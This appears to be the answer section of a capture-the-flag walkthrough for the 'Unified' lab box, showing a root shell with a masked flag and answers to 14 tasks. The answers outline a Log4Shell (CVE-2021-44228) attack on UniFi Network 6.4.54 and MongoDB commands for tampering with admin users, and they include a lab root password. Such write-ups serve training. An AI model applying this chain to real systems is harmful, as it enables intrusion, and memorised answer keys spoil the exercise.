Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


root@unified:~# ls
root.txt
root@unified:~# cat root.txt
e**************************1
root@unified:~# 

Congratulations, you have finished the Unified box.


TASK Solutions


TASK 1: What ports are open?

Ans. 22,6789,8080,8443

TASK 2: Name of the software that is running on the highest port?

Ans. UniFi Network

TASK 3: What is the version of the software that is running?

Ans. 6.4.54

TASK 4: What is the CVE for the identified vulnerability?

Ans. CVE-2021-44228

TASK 5: What is the version of Maven that we installed?

Ans. 3.6.3

TASK 6: What protocol does JNDI leverage in the injection?

Ans. LDAP

TASK 7: What tool do we use to intercept the traffic, indicating the attack was successful?

Ans. tcpdump

TASK 8: What port do we need to inspect intercepted traffic for?

Ans. 389

TASK 9: What port is the MongoDB service running on?

Ans. 27117

TASK 10: What is the default database name for UniFi applications?

Ans. ace

TASK 11: What is the function we use to enumerate users within the database in MongoDB?

Ans. db.admin.find()

TASK 12: What is the function to add data to the database in MongoDB?

Ans. db.admin.insert()

TASK 13: What is the function we use to update users within the database in MongoDB?

Ans. db.admin.update()

TASK 14: What is the password for the root user?

Ans. NotACrackablePassword4U2022

